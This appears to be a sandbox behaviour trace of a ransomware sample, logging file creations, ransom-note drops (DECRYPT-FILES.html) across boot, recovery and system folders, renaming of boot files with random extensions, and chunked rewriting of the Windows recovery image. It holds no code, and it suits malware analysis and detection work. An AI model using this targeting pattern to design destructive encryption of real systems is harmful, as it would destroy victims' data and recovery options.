File Create filename = C:\Boot\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\BCD, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\BCD.LOG, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\BCD.LOG1, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Boot\BCD.LOG1, type = size, size_out = 0 True 1
Fn
Module Create Mapping module_name = C:\Boot\BCD.LOG1, filename = C:\Boot\BCD.LOG1, protection = PAGE_READWRITE, maximum_size = 0 False 1
Fn
File Create filename = C:\Boot\BCD.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Boot\BCD.LOG2, type = size, size_out = 0 True 1
Fn
Module Create Mapping module_name = C:\Boot\BCD.LOG2, filename = C:\Boot\BCD.LOG2, protection = PAGE_READWRITE, maximum_size = 0 False 1
Fn
File Create filename = C:\Boot\BOOTSTAT.DAT, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Boot\BOOTSTAT.DAT, type = size, size_out = 65536 True 1
Fn
Module Create Mapping module_name = C:\Boot\BOOTSTAT.DAT, filename = C:\Boot\BOOTSTAT.DAT, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Module Map C:\Boot\BOOTSTAT.DAT, process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 1
Fn
File Write filename = C:\Boot\BOOTSTAT.DAT, size = 264 True 1
Fn
Data
System Get Time type = Ticks, time = 119481 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Move source_filename = C:\Boot\BOOTSTAT.DAT, destination_filename = C:\Boot\BOOTSTAT.DAT.R0GsRvs True 1
Fn
File Create filename = C:\Boot\cs-CZ\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\cs-CZ\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\cs-CZ\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\cs-CZ\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\cs-CZ\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\da-DK\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\da-DK\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\da-DK\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\da-DK\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\da-DK\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\de-DE\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\de-DE\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\de-DE\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\de-DE\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\de-DE\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\el-GR\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\el-GR\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\el-GR\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\el-GR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\el-GR\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\en-US\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\en-US\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\en-US\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\en-US\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\en-US\memtest.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\en-US\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\es-ES\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\es-ES\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\es-ES\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\es-ES\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\es-ES\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\fi-FI\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\fi-FI\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\fi-FI\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\fi-FI\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\fi-FI\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\Fonts\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\Fonts\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\Fonts\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\Fonts\chs_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\Fonts\cht_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\Fonts\jpn_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\Fonts\kor_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\Fonts\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\Fonts\wgl4_boot.ttf, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\fr-FR\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\fr-FR\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\fr-FR\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\fr-FR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\fr-FR\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\hu-HU\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\hu-HU\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\hu-HU\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\hu-HU\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\hu-HU\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\it-IT\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\it-IT\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\it-IT\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\it-IT\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\it-IT\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\ja-JP\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\ja-JP\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\ja-JP\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\ja-JP\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\ja-JP\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\ko-KR\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\ko-KR\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\ko-KR\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\ko-KR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\ko-KR\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\memtest.exe, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\nb-NO\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\nb-NO\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\nb-NO\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\nb-NO\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\nb-NO\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\nl-NL\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\nl-NL\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\nl-NL\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\nl-NL\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\nl-NL\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\pl-PL\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\pl-PL\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\pl-PL\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\pl-PL\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\pl-PL\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\pt-BR\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\pt-BR\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\pt-BR\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\pt-BR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\pt-BR\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\pt-PT\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\pt-PT\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\pt-PT\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\pt-PT\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\pt-PT\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\ru-RU\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\ru-RU\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\ru-RU\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\ru-RU\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\ru-RU\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\sv-SE\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\sv-SE\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\sv-SE\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\sv-SE\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\sv-SE\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\tr-TR\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\tr-TR\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\tr-TR\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\tr-TR\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\tr-TR\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\zh-CN\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\zh-CN\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\zh-CN\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\zh-CN\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\zh-CN\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\zh-HK\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\zh-HK\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\zh-HK\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\zh-HK\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\zh-HK\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\zh-TW\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Boot\zh-TW\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Boot\zh-TW\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Boot\zh-TW\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\zh-TW\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\bootmgr, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Config.Msi\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Config.Msi\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Config.Msi\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Config.Msi\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Documents and Settings\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Documents and Settings\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\hiberfil.sys, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\MSOCache\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\MSOCache\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\MSOCache\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\MSOCache\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\pagefile.sys, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\PerfLogs\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\PerfLogs\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\PerfLogs\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\PerfLogs\Admin\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\PerfLogs\Admin\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\PerfLogs\Admin\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\PerfLogs\Admin\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\PerfLogs\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Recovery\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Recovery\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Recovery\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, type = size, size_out = 3170304 True 1
Fn
Module Create Mapping module_name = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Module Map C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, size = 264 True 1
Fn
Data
System Get Time type = Ticks, time = 121602 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Move source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, destination_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.XvZHI True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, type = size, size_out = 169213970 True 1
Fn
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 264, size_out = 264 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
